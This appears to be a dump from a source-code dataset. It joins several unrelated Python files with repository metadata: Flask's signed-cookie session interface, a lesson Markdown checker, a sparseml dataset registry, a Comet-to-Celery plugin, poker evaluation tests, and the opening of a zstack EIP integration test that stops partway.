import hashlib import warnings from collections.abc import MutableMapping from datetime import datetime from itsdangerous import BadSignature from itsdangerous import URLSafeTimedSerializer from werkzeug.datastructures import CallbackDict from .helpers import is_ip from .json.tag import TaggedJSONSerializer class SessionMixin(MutableMapping): """Expands a basic dictionary with session attributes.""" @property def permanent(self): """This reflects the ``'_permanent'`` key in the dict.""" return self.get("_permanent", False) @permanent.setter def permanent(self, value): self["_permanent"] = bool(value) #: Some implementations can detect whether a session is newly #: created, but that is not guaranteed. Use with caution. The mixin # default is hard-coded ``False``. new = False #: Some implementations can detect changes to the session and set #: this when that happens. The mixin default is hard coded to #: ``True``. modified = True #: Some implementations can detect when session data is read or #: written and set this when that happens. The mixin default is hard #: coded to ``True``. accessed = True class SecureCookieSession(CallbackDict, SessionMixin): """Base class for sessions based on signed cookies. This session backend will set the :attr:`modified` and :attr:`accessed` attributes. It cannot reliably track whether a session is new (vs. empty), so :attr:`new` remains hard coded to ``False``. """ #: When data is changed, this is set to ``True``. Only the session #: dictionary itself is tracked; if the session contains mutable #: data (for example a nested dict) then this must be set to #: ``True`` manually when modifying that data. The session cookie #: will only be written to the response if this is ``True``. modified = False #: When data is read or written, this is set to ``True``. Used by # :class:`.SecureCookieSessionInterface` to add a ``Vary: Cookie`` #: header, which allows caching proxies to cache different pages for #: different users. 
accessed = False def __init__(self, initial=None): def on_update(self): self.modified = True self.accessed = True super().__init__(initial, on_update) def __getitem__(self, key): self.accessed = True return super().__getitem__(key) def get(self, key, default=None): self.accessed = True return super().get(key, default) def setdefault(self, key, default=None): self.accessed = True return super().setdefault(key, default) class NullSession(SecureCookieSession): """Class used to generate nicer error messages if sessions are not available. Will still allow read-only access to the empty session but fail on setting. """ def _fail(self, *args, **kwargs): raise RuntimeError( "The session is unavailable because no secret " "key was set. Set the secret_key on the " "application to something unique and secret." ) __setitem__ = __delitem__ = clear = pop = popitem = update = setdefault = _fail del _fail class SessionInterface: """The basic interface you have to implement in order to replace the default session interface which uses werkzeug's securecookie implementation. The only methods you have to implement are :meth:`open_session` and :meth:`save_session`, the others have useful defaults which you don't need to change. The session object returned by the :meth:`open_session` method has to provide a dictionary like interface plus the properties and methods from the :class:`SessionMixin`. We recommend just subclassing a dict and adding that mixin:: class Session(dict, SessionMixin): pass If :meth:`open_session` returns ``None`` Flask will call into :meth:`make_null_session` to create a session that acts as replacement if the session support cannot work because some requirement is not fulfilled. The default :class:`NullSession` class that is created will complain that the secret key was not set. 
To replace the session interface on an application all you have to do is to assign :attr:`flask.Flask.session_interface`:: app = Flask(__name__) app.session_interface = MySessionInterface() .. versionadded:: 0.8 """ #: :meth:`make_null_session` will look here for the class that should #: be created when a null session is requested. Likewise the #: :meth:`is_null_session` method will perform a typecheck against #: this type. null_session_class = NullSession #: A flag that indicates if the session interface is pickle based. #: This can be used by Flask extensions to make a decision in regards #: to how to deal with the session object. #: #: .. versionadded:: 0.10 pickle_based = False def make_null_session(self, app): """Creates a null session which acts as a replacement object if the real session support could not be loaded due to a configuration error. This mainly aids the user experience because the job of the null session is to still support lookup without complaining but modifications are answered with a helpful error message of what failed. This creates an instance of :attr:`null_session_class` by default. """ return self.null_session_class() def is_null_session(self, obj): """Checks if a given object is a null session. Null sessions are not asked to be saved. This checks if the object is an instance of :attr:`null_session_class` by default. """ return isinstance(obj, self.null_session_class) def get_cookie_name(self, app): """Returns the name of the session cookie. Uses ``app.session_cookie_name`` which is set to ``SESSION_COOKIE_NAME`` """ return app.session_cookie_name def get_cookie_domain(self, app): """Returns the domain that should be set for the session cookie. Uses ``SESSION_COOKIE_DOMAIN`` if it is configured, otherwise falls back to detecting the domain based on ``SERVER_NAME``. Once detected (or if not set at all), ``SESSION_COOKIE_DOMAIN`` is updated to avoid re-running the logic. 
""" rv = app.config["SESSION_COOKIE_DOMAIN"] # set explicitly, or cached from SERVER_NAME detection # if False, return None if rv is not None: return rv if rv else None rv = app.config["SERVER_NAME"] # server name not set, cache False to return none next time if not rv: app.config["SESSION_COOKIE_DOMAIN"] = False return None # chop off the port which is usually not supported by browsers # remove any leading '.' since we'll add that later rv = rv.rsplit(":", 1)[0].lstrip(".") if "." not in rv: # Chrome doesn't allow names without a '.'. This should only # come up with localhost. Hack around this by not setting # the name, and show a warning. warnings.warn( f"{rv!r} is not a valid cookie domain, it must contain" " a '.'. Add an entry to your hosts file, for example" f" '{rv}.localdomain', and use that instead." ) app.config["SESSION_COOKIE_DOMAIN"] = False return None ip = is_ip(rv) if ip: warnings.warn( "The session cookie domain is an IP address. This may not work" " as intended in some browsers. Add an entry to your hosts" ' file, for example "localhost.localdomain", and use that' " instead." ) # if this is not an ip and app is mounted at the root, allow subdomain # matching by adding a '.' prefix if self.get_cookie_path(app) == "/" and not ip: rv = f".{rv}" app.config["SESSION_COOKIE_DOMAIN"] = rv return rv def get_cookie_path(self, app): """Returns the path for which the cookie should be valid. The default implementation uses the value from the ``SESSION_COOKIE_PATH`` config var if it's set, and falls back to ``APPLICATION_ROOT`` or uses ``/`` if it's ``None``. """ return app.config["SESSION_COOKIE_PATH"] or app.config["APPLICATION_ROOT"] def get_cookie_httponly(self, app): """Returns True if the session cookie should be httponly. This currently just returns the value of the ``SESSION_COOKIE_HTTPONLY`` config var. """ return app.config["SESSION_COOKIE_HTTPONLY"] def get_cookie_secure(self, app): """Returns True if the cookie should be secure. 
This currently just returns the value of the ``SESSION_COOKIE_SECURE`` setting. """ return app.config["SESSION_COOKIE_SECURE"] def get_cookie_samesite(self, app): """Return ``'Strict'`` or ``'Lax'`` if the cookie should use the ``SameSite`` attribute. This currently just returns the value of the :data:`SESSION_COOKIE_SAMESITE` setting. """ return app.config["SESSION_COOKIE_SAMESITE"] def get_expiration_time(self, app, session): """A helper method that returns an expiration date for the session or ``None`` if the session is linked to the browser session. The default implementation returns now + the permanent session lifetime configured on the application. """ if session.permanent: return datetime.utcnow() + app.permanent_session_lifetime def should_set_cookie(self, app, session): """Used by session backends to determine if a ``Set-Cookie`` header should be set for this session cookie for this response. If the session has been modified, the cookie is set. If the session is permanent and the ``SESSION_REFRESH_EACH_REQUEST`` config is true, the cookie is always set. This check is usually skipped if the session was deleted. .. versionadded:: 0.11 """ return session.modified or ( session.permanent and app.config["SESSION_REFRESH_EACH_REQUEST"] ) def open_session(self, app, request): """This method has to be implemented and must either return ``None`` in case the loading failed because of a configuration error or an instance of a session object which implements a dictionary like interface + the methods and attributes on :class:`SessionMixin`. """ raise NotImplementedError() def save_session(self, app, session, response): """This is called for actual sessions returned by :meth:`open_session` at the end of the request. This is still called during a request context so if you absolutely need access to the request you can do that. 
""" raise NotImplementedError() session_json_serializer = TaggedJSONSerializer() class SecureCookieSessionInterface(SessionInterface): """The default session interface that stores sessions in signed cookies through the :mod:`itsdangerous` module. """ #: the salt that should be applied on top of the secret key for the #: signing of cookie based sessions. salt = "cookie-session" #: the hash function to use for the signature. The default is sha1 digest_method = staticmethod(hashlib.sha1) #: the name of the itsdangerous supported key derivation. The default #: is hmac. key_derivation = "hmac" #: A python serializer for the payload. The default is a compact #: JSON derived serializer with support for some extra Python types #: such as datetime objects or tuples. serializer = session_json_serializer session_class = SecureCookieSession def get_signing_serializer(self, app): if not app.secret_key: return None signer_kwargs = dict( key_derivation=self.key_derivation, digest_method=self.digest_method ) return URLSafeTimedSerializer( app.secret_key, salt=self.salt, serializer=self.serializer, signer_kwargs=signer_kwargs, ) def open_session(self, app, request): s = self.get_signing_serializer(app) if s is None: return None val = request.cookies.get(self.get_cookie_name(app)) if not val: return self.session_class() max_age = int(app.permanent_session_lifetime.total_seconds()) try: data = s.loads(val, max_age=max_age) return self.session_class(data) except BadSignature: return self.session_class() def save_session(self, app, session, response): name = self.get_cookie_name(app) domain = self.get_cookie_domain(app) path = self.get_cookie_path(app) secure = self.get_cookie_secure(app) samesite = self.get_cookie_samesite(app) # If the session is modified to be empty, remove the cookie. # If the session is empty, return without setting the cookie. 
if not session: if session.modified: response.delete_cookie( name, domain=domain, path=path, secure=secure, samesite=samesite ) return # Add a "Vary: Cookie" header if the session was accessed at all. if session.accessed: response.vary.add("Cookie") if not self.should_set_cookie(app, session): return httponly = self.get_cookie_httponly(app) expires = self.get_expiration_time(app, session) val = self.get_signing_serializer(app).dumps(dict(session)) response.set_cookie( name, val, expires=expires, httponly=httponly, domain=domain, path=path, secure=secure, samesite=samesite, )
36.984456
84
0.650743
795a9247526bfca92fa858910a15da39810d2e98
18,706
py
Python
bin/lesson_check.py
shandongfx/NIMBioSENM
1c39779791d9570b89ebf5b1d7f96ce682e16b26
[ "CC-BY-4.0" ]
2
2019-09-27T10:36:40.000Z
2021-02-25T19:24:19.000Z
bin/lesson_check.py
shandongfx/NIMBioSENM
1c39779791d9570b89ebf5b1d7f96ce682e16b26
[ "CC-BY-4.0" ]
null
null
null
bin/lesson_check.py
shandongfx/NIMBioSENM
1c39779791d9570b89ebf5b1d7f96ce682e16b26
[ "CC-BY-4.0" ]
2
2020-07-19T14:18:10.000Z
2020-11-24T00:47:53.000Z
#!/usr/bin/env python3 """ Check lesson files and their contents. """ import os import glob import re from argparse import ArgumentParser from util import (Reporter, read_markdown, load_yaml, check_unwanted_files, require) __version__ = '0.3' # Where to look for source Markdown files. SOURCE_DIRS = ['', '_episodes', '_extras'] # Where to look for source Rmd files. SOURCE_RMD_DIRS = ['_episodes_rmd'] # Required files: each entry is ('path': YAML_required). # FIXME: We do not yet validate whether any files have the required # YAML headers, but should in the future. # The '%' is replaced with the source directory path for checking. # Episodes are handled specially, and extra files in '_extras' are also handled # specially. This list must include all the Markdown files listed in the # 'bin/initialize' script. REQUIRED_FILES = { '%/CODE_OF_CONDUCT.md': False, '%/CONTRIBUTING.md': False, '%/LICENSE.md': False, '%/README.md': False, '%/_extras/discuss.md': False, '%/_extras/guide.md': False, '%/index.md': True, '%/reference.md': False, '%/setup.md': False, } # Episode filename pattern. P_EPISODE_FILENAME = re.compile(r'/_episodes/(\d\d)-[-\w]+.md$') # Pattern to match lines ending with whitespace. P_TRAILING_WHITESPACE = re.compile(r'\s+$') # Pattern to match figure references in HTML. P_FIGURE_REFS = re.compile(r'<img[^>]+src="([^"]+)"[^>]*>') # Pattern to match internally-defined Markdown links. P_INTERNAL_LINK_REF = re.compile(r'\[([^\]]+)\]\[([^\]]+)\]') # Pattern to match reference links (to resolve internally-defined references). P_INTERNAL_LINK_DEF = re.compile(r'^\[([^\]]+)\]:\s*(.+)') # What kinds of blockquotes are allowed? KNOWN_BLOCKQUOTES = { 'callout', 'challenge', 'checklist', 'discussion', 'keypoints', 'objectives', 'prereq', 'quotation', 'solution', 'testimonial' } # What kinds of code fragments are allowed? 
KNOWN_CODEBLOCKS = { 'error', 'output', 'source', 'language-bash', 'html', 'language-make', 'language-matlab', 'language-python', 'language-r', 'language-shell', 'language-sql' } # What fields are required in teaching episode metadata? TEACHING_METADATA_FIELDS = { ('title', str), ('teaching', int), ('exercises', int), ('questions', list), ('objectives', list), ('keypoints', list) } # What fields are required in break episode metadata? BREAK_METADATA_FIELDS = { ('layout', str), ('title', str), ('break', int) } # How long are lines allowed to be? # Please keep this in sync with .editorconfig! MAX_LINE_LEN = 100 def main(): """Main driver.""" args = parse_args() args.reporter = Reporter() check_config(args.reporter, args.source_dir) check_source_rmd(args.reporter, args.source_dir, args.parser) args.references = read_references(args.reporter, args.reference_path) docs = read_all_markdown(args.source_dir, args.parser) check_fileset(args.source_dir, args.reporter, list(docs.keys())) check_unwanted_files(args.source_dir, args.reporter) for filename in list(docs.keys()): checker = create_checker(args, filename, docs[filename]) checker.check() args.reporter.report() if args.reporter.messages and not args.permissive: exit(1) def parse_args(): """Parse command-line arguments.""" parser = ArgumentParser(description="""Check episode files in a lesson.""") parser.add_argument('-l', '--linelen', default=False, action="store_true", dest='line_lengths', help='Check line lengths') parser.add_argument('-p', '--parser', default=None, dest='parser', help='path to Markdown parser') parser.add_argument('-r', '--references', default=None, dest='reference_path', help='path to Markdown file of external references') parser.add_argument('-s', '--source', default=os.curdir, dest='source_dir', help='source directory') parser.add_argument('-w', '--whitespace', default=False, action="store_true", dest='trailing_whitespace', help='Check for trailing whitespace') parser.add_argument('--permissive', 
default=False, action="store_true", dest='permissive', help='Do not raise an error even if issues are detected') args, extras = parser.parse_known_args() require(args.parser is not None, 'Path to Markdown parser not provided') require(not extras, 'Unexpected trailing command-line arguments "{0}"'.format(extras)) return args def check_config(reporter, source_dir): """Check configuration file.""" config_file = os.path.join(source_dir, '_config.yml') config = load_yaml(config_file) reporter.check_field(config_file, 'configuration', config, 'kind', 'lesson') reporter.check_field(config_file, 'configuration', config, 'carpentry', ('swc', 'dc', 'lc', 'cp')) reporter.check_field(config_file, 'configuration', config, 'title') reporter.check_field(config_file, 'configuration', config, 'email') for defaults in [ {'values': {'root': '.', 'layout': 'page'}}, {'values': {'root': '..', 'layout': 'episode'}, 'scope': {'type': 'episodes', 'path': ''}}, {'values': {'root': '..', 'layout': 'page'}, 'scope': {'type': 'extras', 'path': ''}} ]: reporter.check(defaults in config.get('defaults', []), 'configuration', '"root" not set to "." 
in configuration') def check_source_rmd(reporter, source_dir, parser): """Check that Rmd episode files include `source: Rmd`""" episode_rmd_dir = [os.path.join(source_dir, d) for d in SOURCE_RMD_DIRS] episode_rmd_files = [os.path.join(d, '*.Rmd') for d in episode_rmd_dir] results = {} for pat in episode_rmd_files: for f in glob.glob(pat): data = read_markdown(parser, f) dy = data['metadata'] if dy: reporter.check_field(f, 'episode_rmd', dy, 'source', 'Rmd') def read_references(reporter, ref_path): """Read shared file of reference links, returning dictionary of valid references {symbolic_name : URL} """ result = {} urls_seen = set() if ref_path: with open(ref_path, 'r') as reader: for (num, line) in enumerate(reader): line_num = num + 1 m = P_INTERNAL_LINK_DEF.search(line) require(m, '{0}:{1} not valid reference:\n{2}'.format(ref_path, line_num, line.rstrip())) name = m.group(1) url = m.group(2) require(name, 'Empty reference at {0}:{1}'.format(ref_path, line_num)) reporter.check(name not in result, ref_path, 'Duplicate reference {0} at line {1}', name, line_num) reporter.check(url not in urls_seen, ref_path, 'Duplicate definition of URL {0} at line {1}', url, line_num) result[name] = url urls_seen.add(url) return result def read_all_markdown(source_dir, parser): """Read source files, returning {path : {'metadata':yaml, 'metadata_len':N, 'text':text, 'lines':[(i, line, len)], 'doc':doc}} """ all_dirs = [os.path.join(source_dir, d) for d in SOURCE_DIRS] all_patterns = [os.path.join(d, '*.md') for d in all_dirs] result = {} for pat in all_patterns: for filename in glob.glob(pat): data = read_markdown(parser, filename) if data: result[filename] = data return result def check_fileset(source_dir, reporter, filenames_present): """Are all required files present? Are extraneous files present?""" # Check files with predictable names. 
required = [p.replace('%', source_dir) for p in REQUIRED_FILES] missing = set(required) - set(filenames_present) for m in missing: reporter.add(None, 'Missing required file {0}', m) # Check episode files' names. seen = [] for filename in filenames_present: if '_episodes' not in filename: continue m = P_EPISODE_FILENAME.search(filename) if m and m.group(1): seen.append(m.group(1)) else: reporter.add( None, 'Episode {0} has badly-formatted filename', filename) # Check for duplicate episode numbers. reporter.check(len(seen) == len(set(seen)), None, 'Duplicate episode numbers {0} vs {1}', sorted(seen), sorted(set(seen))) # Check that numbers are consecutive. seen = sorted([int(s) for s in seen]) clean = True for i in range(len(seen) - 1): clean = clean and ((seen[i+1] - seen[i]) == 1) reporter.check(clean, None, 'Missing or non-consecutive episode numbers {0}', seen) def create_checker(args, filename, info): """Create appropriate checker for file.""" for (pat, cls) in CHECKERS: if pat.search(filename): return cls(args, filename, **info) return NotImplemented class CheckBase: """Base class for checking Markdown files.""" def __init__(self, args, filename, metadata, metadata_len, text, lines, doc): """Cache arguments for checking.""" self.args = args self.reporter = self.args.reporter # for convenience self.filename = filename self.metadata = metadata self.metadata_len = metadata_len self.text = text self.lines = lines self.doc = doc self.layout = None def check(self): """Run tests.""" self.check_metadata() self.check_line_lengths() self.check_trailing_whitespace() self.check_blockquote_classes() self.check_codeblock_classes() self.check_defined_link_references() def check_metadata(self): """Check the YAML metadata.""" self.reporter.check(self.metadata is not None, self.filename, 'Missing metadata entirely') if self.metadata and (self.layout is not None): self.reporter.check_field( self.filename, 'metadata', self.metadata, 'layout', self.layout) def 
check_line_lengths(self): """Check the raw text of the lesson body.""" if self.args.line_lengths: over = [i for (i, l, n) in self.lines if ( n > MAX_LINE_LEN) and (not l.startswith('!'))] self.reporter.check(not over, self.filename, 'Line(s) are too long: {0}', ', '.join([str(i) for i in over])) def check_trailing_whitespace(self): """Check for whitespace at the ends of lines.""" if self.args.trailing_whitespace: trailing = [ i for (i, l, n) in self.lines if P_TRAILING_WHITESPACE.match(l)] self.reporter.check(not trailing, self.filename, 'Line(s) end with whitespace: {0}', ', '.join([str(i) for i in trailing])) def check_blockquote_classes(self): """Check that all blockquotes have known classes.""" for node in self.find_all(self.doc, {'type': 'blockquote'}): cls = self.get_val(node, 'attr', 'class') self.reporter.check(cls in KNOWN_BLOCKQUOTES, (self.filename, self.get_loc(node)), 'Unknown or missing blockquote type {0}', cls) def check_codeblock_classes(self): """Check that all code blocks have known classes.""" for node in self.find_all(self.doc, {'type': 'codeblock'}): cls = self.get_val(node, 'attr', 'class') self.reporter.check(cls in KNOWN_CODEBLOCKS, (self.filename, self.get_loc(node)), 'Unknown or missing code block type {0}', cls) def check_defined_link_references(self): """Check that defined links resolve in the file. Internally-defined links match the pattern [text][label]. 
""" result = set() for node in self.find_all(self.doc, {'type': 'text'}): for match in P_INTERNAL_LINK_REF.findall(node['value']): text = match[0] link = match[1] if link not in self.args.references: result.add('"{0}"=>"{1}"'.format(text, link)) self.reporter.check(not result, self.filename, 'Internally-defined links may be missing definitions: {0}', ', '.join(sorted(result))) def find_all(self, node, pattern, accum=None): """Find all matches for a pattern.""" assert isinstance(pattern, dict), 'Patterns must be dictionaries' if accum is None: accum = [] if self.match(node, pattern): accum.append(node) for child in node.get('children', []): self.find_all(child, pattern, accum) return accum def match(self, node, pattern): """Does this node match the given pattern?""" for key in pattern: if key not in node: return False val = pattern[key] if isinstance(val, str): if node[key] != val: return False elif isinstance(val, dict): if not self.match(node[key], val): return False return True @staticmethod def get_val(node, *chain): """Get value one or more levels down.""" curr = node for selector in chain: curr = curr.get(selector, None) if curr is None: break return curr def get_loc(self, node): """Convenience method to get node's line number.""" result = self.get_val(node, 'options', 'location') if self.metadata_len is not None: result += self.metadata_len return result class CheckNonJekyll(CheckBase): """Check a file that isn't translated by Jekyll.""" def check_metadata(self): self.reporter.check(self.metadata is None, self.filename, 'Unexpected metadata') class CheckIndex(CheckBase): """Check the main index page.""" def __init__(self, args, filename, metadata, metadata_len, text, lines, doc): super().__init__(args, filename, metadata, metadata_len, text, lines, doc) self.layout = 'lesson' def check_metadata(self): super().check_metadata() self.reporter.check(self.metadata.get('root', '') == '.', self.filename, 'Root not set to "."') class CheckEpisode(CheckBase): """Check 
an episode page.""" def check(self): """Run extra tests.""" super().check() self.check_reference_inclusion() def check_metadata(self): super().check_metadata() if self.metadata: if 'layout' in self.metadata: if self.metadata['layout'] == 'break': self.check_metadata_fields(BREAK_METADATA_FIELDS) else: self.reporter.add(self.filename, 'Unknown episode layout "{0}"', self.metadata['layout']) else: self.check_metadata_fields(TEACHING_METADATA_FIELDS) def check_metadata_fields(self, expected): """Check metadata fields.""" for (name, type_) in expected: if name not in self.metadata: self.reporter.add(self.filename, 'Missing metadata field {0}', name) elif not isinstance(self.metadata[name], type_): self.reporter.add(self.filename, '"{0}" has wrong type in metadata ({1} instead of {2})', name, type(self.metadata[name]), type_) def check_reference_inclusion(self): """Check that links file has been included.""" if not self.args.reference_path: return for (i, last_line, line_len) in reversed(self.lines): if last_line: break require(last_line, 'No non-empty lines in {0}'.format(self.filename)) include_filename = os.path.split(self.args.reference_path)[-1] if include_filename not in last_line: self.reporter.add(self.filename, 'episode does not include "{0}"', include_filename) class CheckReference(CheckBase): """Check the reference page.""" def __init__(self, args, filename, metadata, metadata_len, text, lines, doc): super().__init__(args, filename, metadata, metadata_len, text, lines, doc) self.layout = 'reference' class CheckGeneric(CheckBase): """Check a generic page.""" def __init__(self, args, filename, metadata, metadata_len, text, lines, doc): super().__init__(args, filename, metadata, metadata_len, text, lines, doc) CHECKERS = [ (re.compile(r'CONTRIBUTING\.md'), CheckNonJekyll), (re.compile(r'README\.md'), CheckNonJekyll), (re.compile(r'index\.md'), CheckIndex), (re.compile(r'reference\.md'), CheckReference), (re.compile(r'_episodes/.*\.md'), CheckEpisode), 
(re.compile(r'aio\.md'), CheckNonJekyll), (re.compile(r'.*\.md'), CheckGeneric) ] if __name__ == '__main__': main()
34.07286
103
0.560355
795a934bd340a64090dbec5a2387a56d309adee2
2,761
py
Python
src/sparseml/keras/datasets/registry.py
clementpoiret/sparseml
8442a6ef8ba11fb02f5e51472dd68b72438539b9
[ "Apache-2.0" ]
922
2021-02-04T17:51:54.000Z
2022-03-31T20:49:26.000Z
src/sparseml/keras/datasets/registry.py
clementpoiret/sparseml
8442a6ef8ba11fb02f5e51472dd68b72438539b9
[ "Apache-2.0" ]
197
2021-02-04T22:17:21.000Z
2022-03-31T13:58:55.000Z
src/sparseml/keras/datasets/registry.py
clementpoiret/sparseml
8442a6ef8ba11fb02f5e51472dd68b72438539b9
[ "Apache-2.0" ]
80
2021-02-04T22:20:14.000Z
2022-03-30T19:36:15.000Z
# Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Code related to the Keras dataset registry for easily creating datasets. """ from typing import Any, Dict, List, Union __all__ = ["DatasetRegistry"] class DatasetRegistry(object): """ Registry class for creating datasets """ _CONSTRUCTORS = {} _ATTRIBUTES = {} @staticmethod def create(key: str, *args, **kwargs): """ Create a new dataset for the given key :param key: the dataset key (name) to create :return: the instantiated model """ if key not in DatasetRegistry._CONSTRUCTORS: raise ValueError( "key {} is not in the model registry; available: {}".format( key, DatasetRegistry._CONSTRUCTORS.keys() ) ) return DatasetRegistry._CONSTRUCTORS[key](*args, **kwargs) @staticmethod def attributes(key: str) -> Dict[str, Any]: """ :param key: the dataset key (name) to create :return: the specified attributes for the dataset """ if key not in DatasetRegistry._CONSTRUCTORS: raise ValueError( "key {} is not in the model registry; available: {}".format( key, DatasetRegistry._CONSTRUCTORS.keys() ) ) return DatasetRegistry._ATTRIBUTES[key] @staticmethod def register(key: Union[str, List[str]], attributes: Dict[str, Any]): """ Register a dataset with the registry. 
Should be used as a decorator :param key: the model key (name) to create :param attributes: the specified attributes for the dataset :return: the decorator """ if not isinstance(key, List): key = [key] def decorator(const_func): for r_key in key: if r_key in DatasetRegistry._CONSTRUCTORS: raise ValueError("key {} is already registered".format(key)) DatasetRegistry._CONSTRUCTORS[r_key] = const_func DatasetRegistry._ATTRIBUTES[r_key] = attributes return const_func return decorator
32.104651
80
0.624049
795a93929fb072cbdc0e711dbb1238260072c5de
1,104
py
Python
comet_plugin/comet/plugins/add_to_celery_queue.py
4pisky/fourpisky-core
1dc9c4f73dfef075e2a27c3c8453d811a5a99e58
[ "BSD-2-Clause" ]
2
2016-08-25T22:20:58.000Z
2018-11-18T21:16:11.000Z
comet_plugin/comet/plugins/add_to_celery_queue.py
4pisky/fourpisky-core
1dc9c4f73dfef075e2a27c3c8453d811a5a99e58
[ "BSD-2-Clause" ]
2
2016-11-01T14:10:58.000Z
2016-11-01T14:11:39.000Z
comet_plugin/comet/plugins/add_to_celery_queue.py
4pisky/fourpisky-core
1dc9c4f73dfef075e2a27c3c8453d811a5a99e58
[ "BSD-2-Clause" ]
null
null
null
# Defines a plugin for the Comet broker. # If top-level directory 'comet_plugin' is added to $PYTHONPATH then comet # will detect this module at import-time. import os from zope.interface import implementer from twisted.plugin import IPlugin from comet.icomet import IHandler, IHasOptions import comet.log as log from fourpisky.taskqueue.tasks import ( process_voevent_celerytask, ingest_voevent_celerytask ) @implementer(IPlugin, IHandler) class CeleryQueuer(object): name = "celery-queue" # When the handler is called, it is passed an instance of # comet.utility.xml.xml_document. def __call__(self, event): """ Add an event to the celery processing queue """ log.debug("Passing to celery...") try: process_voevent_celerytask.delay(event.raw_bytes) ingest_voevent_celerytask.delay(event.raw_bytes) except Exception as e: self.deferred.errback(e) log.debug("Celery jobs sent OK.") # This instance of the handler is what actually constitutes our plugin. queue_event = CeleryQueuer()
30.666667
74
0.711957
795a9393037a0b3328e5e3c9c210c3b8c9ac79af
1,354
py
Python
pokershell/tests/eval/test_context.py
fblaha/pokershell
36a3bfff6ead7fef175e430dfdb88ac6f6a31d1f
[ "Apache-2.0" ]
6
2016-05-13T07:39:37.000Z
2022-03-05T07:23:46.000Z
pokershell/tests/eval/test_context.py
fblaha/pokershell
36a3bfff6ead7fef175e430dfdb88ac6f6a31d1f
[ "Apache-2.0" ]
1
2017-12-18T09:08:28.000Z
2017-12-31T01:48:32.000Z
pokershell/tests/eval/test_context.py
fblaha/pokershell
36a3bfff6ead7fef175e430dfdb88ac6f6a31d1f
[ "Apache-2.0" ]
5
2016-10-11T23:54:35.000Z
2022-03-05T07:23:47.000Z
import unittest import pokershell.model as model import pokershell.tests.eval.common as common class TestEvalContext(unittest.TestCase, common.TestUtilsMixin): def setUp(self): super().setUp() self.ctx = self.create_context('2h 2c 2d 5h Jh Jc') def test_rank_dict(self): self.assertEqual(2, len(self.ctx.rank_dict[model.Rank.JACK])) self.assertEqual(3, len(self.ctx.rank_dict[model.Rank.DEUCE])) self.assertEqual(1, len(self.ctx.rank_dict[model.Rank.FIVE])) self.assertEqual(0, len(self.ctx.rank_dict[model.Rank.SEVEN])) def test_suit_dict(self): self.assertEqual(2, len(self.ctx.suit_dict[model.Suit.CLUBS])) self.assertEqual(3, len(self.ctx.suit_dict[model.Suit.HEARTS])) self.assertEqual(1, len(self.ctx.suit_dict[model.Suit.DIAMONDS])) def test_sorted_ranks(self): self.assertEqual([model.Rank.JACK, model.Rank.JACK, model.Rank.FIVE], self.ctx.sorted_ranks[:3]) def test_complement_ranks(self): self.assertEqual([model.Rank.DEUCE], self.ctx.get_complement_ranks( 1, model.Rank.JACK, model.Rank.FIVE)) self.assertEqual([model.Rank.JACK, model.Rank.JACK, model.Rank.DEUCE], self.ctx.get_complement_ranks(3, model.Rank.FIVE))
41.030303
78
0.655835
795a93c3e5229eb4e6f5a5c3186553eb0052991f
4,054
py
Python
integrationtest/vm/virtualrouter/eip/test_2_eips.py
sherry546/zstack-woodpecker
54a37459f2d72ce6820974feaa6eb55772c3d2ce
[ "Apache-2.0" ]
1
2021-03-21T12:41:11.000Z
2021-03-21T12:41:11.000Z
integrationtest/vm/virtualrouter/eip/test_2_eips.py
sherry546/zstack-woodpecker
54a37459f2d72ce6820974feaa6eb55772c3d2ce
[ "Apache-2.0" ]
null
null
null
integrationtest/vm/virtualrouter/eip/test_2_eips.py
sherry546/zstack-woodpecker
54a37459f2d72ce6820974feaa6eb55772c3d2ce
[ "Apache-2.0" ]
1
2017-05-19T06:40:40.000Z
2017-05-19T06:40:40.000Z
''' Test create 2 EIPs for 2 Vms in same L3 Network. So 2 VIPs will be setup in same VR , then check if 2 VM could use VIP to connect each other. Test step: 1. Create 2 VMs 2. Create a EIP with VM's nic each 3. Check the 2 EIPs connectibility 4. Destroy VMs @author: Youyk ''' import zstackwoodpecker.test_util as test_util import zstackwoodpecker.test_lib as test_lib import zstackwoodpecker.test_state as test_state import os test_stub = test_lib.lib_get_test_stub() test_obj_dict = test_state.TestStateDict() def test(): test_util.test_dsc('Create test vm with EIP and check.') vm1 = test_stub.create_vlan_vm(os.environ.get('l3VlanNetworkName1')) test_obj_dict.add_vm(vm1) vm2 = test_stub.create_vlan_vm(os.environ.get('l3VlanNetworkName1')) test_obj_dict.add_vm(vm2) l3_name = os.environ.get('l3VlanNetworkName1') vr1_l3_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid vrs = test_lib.lib_find_vr_by_l3_uuid(vr1_l3_uuid) temp_vm1 = None if not vrs: #create temp_vm1 for getting vlan1's vr for test pf_vm portforwarding temp_vm1 = test_stub.create_vlan_vm() test_obj_dict.add_vm(temp_vm1) vr1 = test_lib.lib_find_vr_by_vm(temp_vm1.vm)[0] else: vr1 = vrs[0] if vr1.applianceVmType == "vrouter": test_util.test_skip("vrouter VR does not support single VM multiple EIP") l3_name = os.environ.get('l3NoVlanNetworkName1') vr2_l3_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid vrs = test_lib.lib_find_vr_by_l3_uuid(vr2_l3_uuid) temp_vm2 = None if not vrs: #create temp_vm2 for getting novlan's vr for test pf_vm portforwarding temp_vm2 = test_stub.create_user_vlan_vm() test_obj_dict.add_vm(temp_vm2) vr2 = test_lib.lib_find_vr_by_vm(temp_vm2.vm)[0] else: vr2 = vrs[0] if vr1.applianceVmType == "vrouter": test_util.test_skip("vrouter VR does not support single VM multiple EIP") #we do not need temp_vm1 and temp_vm2, since we just use their VRs. 
